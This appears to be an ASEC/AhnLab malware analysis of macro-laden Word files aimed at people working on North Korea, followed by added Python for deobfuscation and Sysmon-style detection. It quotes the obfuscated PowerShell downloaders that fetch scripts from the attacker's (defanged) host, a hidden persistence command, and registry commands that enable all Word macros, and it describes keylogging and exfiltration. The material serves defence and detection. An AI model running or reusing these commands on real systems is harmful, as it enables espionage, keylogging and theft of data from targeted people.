Malicious Word Files Targeting Specific Individuals Related to North Korea – ASEC BLOG

The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows:

Date          Filename
July 18th     (Format Style) Collecting Feedback of Experts on 2022 National Liberation Day Congratulatory Speech in Advance.doc
July 20th     0511_Meeting Proceeding of ***, Director of Ministry of Unification.doc
August 1st    Asan Symposium 2022.doc
August 3rd    Questionnaire (Researcher Hyeon).doc
August 4th    Questionnaire (President Ahn).doc
August 11th   (Plan) Session 6. Gyeonggi-do “Social Conversation for Peace and Unity” Promotion Plan.doc
August 16th   Questionnaire (Doctor Jeong).doc
August 17th   Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc
Confirmed Filenames

The Word files contain malicious VBA macro code identical to type B introduced in AhnLab TIP under the title <Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files>. The overall operation process is as follows:

Figure 1. Operation process

The macro code in the most recently discovered file titled Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc is shown below.

Figure 2. Confirmed macro code

This macro code is somewhat more obfuscated than the one covered in the previous post 'APT Attack Attempts Using Word Documents to Target Specific Individuals'. When the macro runs, it uses PowerShell to download an additional script from 'hxxp://vjdif.mypressonline[.]com/ho/ng.txt'.

[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};$j=$f.Replace('wra','');$u=$j.Replace('eilsdjfe','nloadstri');$x=iex $u;iex $x
PowerShell command that is run
Figure 3. Script from hxxp://vjdif.mypressonline[.]com/ho/ng.txt

This script uses the following commands to collect information about the user's PC, encodes the data and saves it to %APPDATA%\Ahnalb\Ahnlab.hwp, and finally sends it to 'hxxp://vjdif.mypressonline[.]com/ho/post.php'.

Execution Command                 Collected Information
GetFolderPath("Recent")           Recent folder path
dir $env:ProgramFiles             ProgramFiles folder information
dir "C:\Program Files (x86)"      C:\Program Files (x86) folder information
systeminfo                        System info
tasklist                          List of running processes
Collected Information

If a registry value named AhnlabUpdate exists under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the script skips collecting information and immediately sends the log file. This is likely intended to collect the keylogging data, since the same filename (Ahnlab.hwp) is reused as the keylog file in later runs.

Once the data is sent, the script accesses hxxp://vjdif.mypressonline[.]com/ho/ng.down to download and run an additional encoded script.

The additionally downloaded file ng.down is encoded and is executed as a PowerShell background job via the Start-Job command. The script performs the following functions:

  • Creating shortcut

It creates a file named HncSerial.log containing PowerShell commands in the C:\windows\temp folder. It also creates a shortcut to this file in the Startup folder so that the malware keeps running after the PC is restarted.

Figure 4. Created file

[string]$a = {(New-Object Net.WebClient).Dokarysuntring('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};$b=$a.replace('karysun','wnloadS');$c=iex $b;iex $c
HncSerial.log file content
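Both the macro's PowerShell command (Figure 3) and the HncSerial.log content above hide the real downloader behind a chain of .Replace() calls. As an added example that is not part of the original post or of AhnLab's tooling, the Python below emulates that chain for analysis: it extracts the [string]$var={...} block, applies each .Replace() in order, and returns the command that iex would have executed. The two inputs are constructed copies of the commands quoted above, with the URLs still defanged.

```python
import re

# Constructed copies of the two obfuscated commands quoted in the post (URLs kept defanged).
MACRO_STAGE1 = ("[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant)"
                ".Doweilsdjfeng('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};"
                "$j=$f.Replace('wra','');$u=$j.Replace('eilsdjfe','nloadstri');$x=iex $u;iex $x")
HNCSERIAL_LOG = ("[string]$a = {(New-Object Net.WebClient)"
                 ".Dokarysuntring('hxxp://vjdif.mypressonline[.]com/ho/ng.txt')};"
                 "$b=$a.replace('karysun','wnloadS');$c=iex $b;iex $c")

# The obfuscated command lives in a script block assigned to a [string] variable ...
BLOCK_RE = re.compile(r"\[string\]\$\w+\s*=\s*\{(.*?)\};", re.S)
# ... and each .Replace('old','new') call peels off one layer; '' (two quotes) means delete.
REPLACE_RE = re.compile(r"\.[Rr]eplace\('([^']*)','([^']*)'\)")
URL_RE = re.compile(r"'(hxxps?://[^']+)'")

def deobfuscate(script):
    """Apply the script's own Replace() chain, in order, to recover the command handed to iex."""
    block = BLOCK_RE.search(script)
    if block is None:
        raise ValueError("no [string]$var={...} block found")
    command = block.group(1)
    for old, new in REPLACE_RE.findall(script):
        # .NET String.Replace is case-sensitive, and so is Python's str.replace.
        command = command.replace(old, new)
    return command

def download_url(script):
    """Return the (defanged) URL the recovered command fetches, or None if there is none."""
    m = URL_RE.search(deobfuscate(script))
    return m.group(1) if m else None

if __name__ == "__main__":
    for label, sample in (("macro stage 1", MACRO_STAGE1), ("HncSerial.log", HNCSERIAL_LOG)):
        print(f"{label}: {deobfuscate(sample)}")
```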

The following PowerShell command is run by the shortcut.

powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\windows\temp\HncSerial.log');iex $x}
Execution Command
Figure 5. Created shortcut
  • Changing Office security settings

The script changes the registry values for Office's macro security settings so that macros always run.

New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1
Commands for changing registry
  • Keylogging

The user's keystrokes are saved to %APPDATA%\Ahnalb\Ahnlab.hwp. When the user starts their PC, the previously created shortcut runs, accesses hxxp://vjdif.mypressonline[.]com/ho/ng.txt, executes the PowerShell commands on that page, and ultimately sends the saved information to hxxp://vjdif.mypressonline[.]com/ho/post.php.

Figure 6. Code related to keylogging
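The second stage leaves several host artifacts that can be hunted for: the VBAWarnings change, HncSerial.log in C:\windows\temp, the Startup shortcut, the hidden PowerShell it launches, the Ahnlab.hwp keylog file and the AhnlabUpdate Run value. As an added example that is not part of the original post, the Python below runs simple rules for each of these over constructed Sysmon-style events. The event layout (EventID 1/11/13 with CommandLine, TargetFilename, TargetObject and Details fields), the SID, user name and shortcut filename are assumptions, not data from the analysis.

```python
import re

# Each rule: (name, Sysmon EventID, field to inspect, pattern). Assumed Sysmon field names:
# EventID 1 = process create (CommandLine), 11 = file create (TargetFilename), 13 = registry set (TargetObject/Details).
RULES = [
    ("office_macro_security_disabled", 13, "TargetObject",
     re.compile(r"\\Office\\\d+\.\d\\Word\\Security\\VBAWarnings$", re.I)),
    ("run_key_ahnlabupdate", 13, "TargetObject",
     re.compile(r"\\CurrentVersion\\Run\\AhnlabUpdate$", re.I)),
    ("hncserial_dropped_in_temp", 11, "TargetFilename",
     re.compile(r"^C:\\Windows\\Temp\\HncSerial\.log$", re.I)),
    ("keylog_store_ahnlab_hwp", 11, "TargetFilename",
     re.compile(r"\\Ahnalb\\Ahnlab\.hwp$", re.I)),
    ("startup_shortcut_created", 11, "TargetFilename",
     re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
    ("hidden_powershell_iex_from_file", 1, "CommandLine",
     re.compile(r"-WindowStyle\s+Hidden.*ReadAllText\(.*\biex\b", re.I)),
]

def match_event(event):
    """Return the names of all rules that fire on one event."""
    hits = []
    for name, event_id, field, pattern in RULES:
        if event.get("EventID") != event_id or not pattern.search(event.get(field, "")):
            continue
        # VBAWarnings = 1 means "enable all macros"; 2, 3 and 4 are the safe settings, so ignore those.
        if name == "office_macro_security_disabled" and "0x00000001" not in event.get("Details", ""):
            continue
        hits.append(name)
    return hits

def scan(events):
    """Return (RecordId, rule name) pairs for every event that triggers a rule."""
    return [(e["RecordId"], name) for e in events for name in match_event(e)]

# Constructed sample telemetry (not real logs); the SID, user name and shortcut name are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 13, "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\SOFTWARE\Microsoft\Office\16.0\Word\Security\VBAWarnings"},
    {"RecordId": 2, "EventID": 13, "Details": "DWORD (0x00000002)",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\SOFTWARE\Microsoft\Office\16.0\Word\Security\VBAWarnings"},
    {"RecordId": 3, "EventID": 11, "TargetFilename": r"C:\windows\temp\HncSerial.log"},
    {"RecordId": 4, "EventID": 11, "TargetFilename":
     r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\placeholder.lnk"},
    {"RecordId": 5, "EventID": 1, "CommandLine":
     r"powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\windows\temp\HncSerial.log');iex $x}"},
    {"RecordId": 6, "EventID": 1, "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"RecordId": 7, "EventID": 11, "TargetFilename": r"C:\Users\user\AppData\Roaming\Ahnalb\Ahnlab.hwp"},
]

if __name__ == "__main__":
    for record_id, rule in scan(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

Record 2 (VBAWarnings set to 2, the default "disable with notification") and record 6 (an ordinary script run) are included to show that the rules stay quiet on benign events.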

As Word files targeting individuals related to North Korea continue to be discovered, users need to take extra caution. They should refrain from opening email attachments from unknown senders and files from unknown sources. Furthermore, they should keep their Office security settings such that malicious macros in Word files are not executed automatically.

[File Detection]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload

[IOC]
cbafe2d6c3b36087220fe63129a1e611 (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/38182/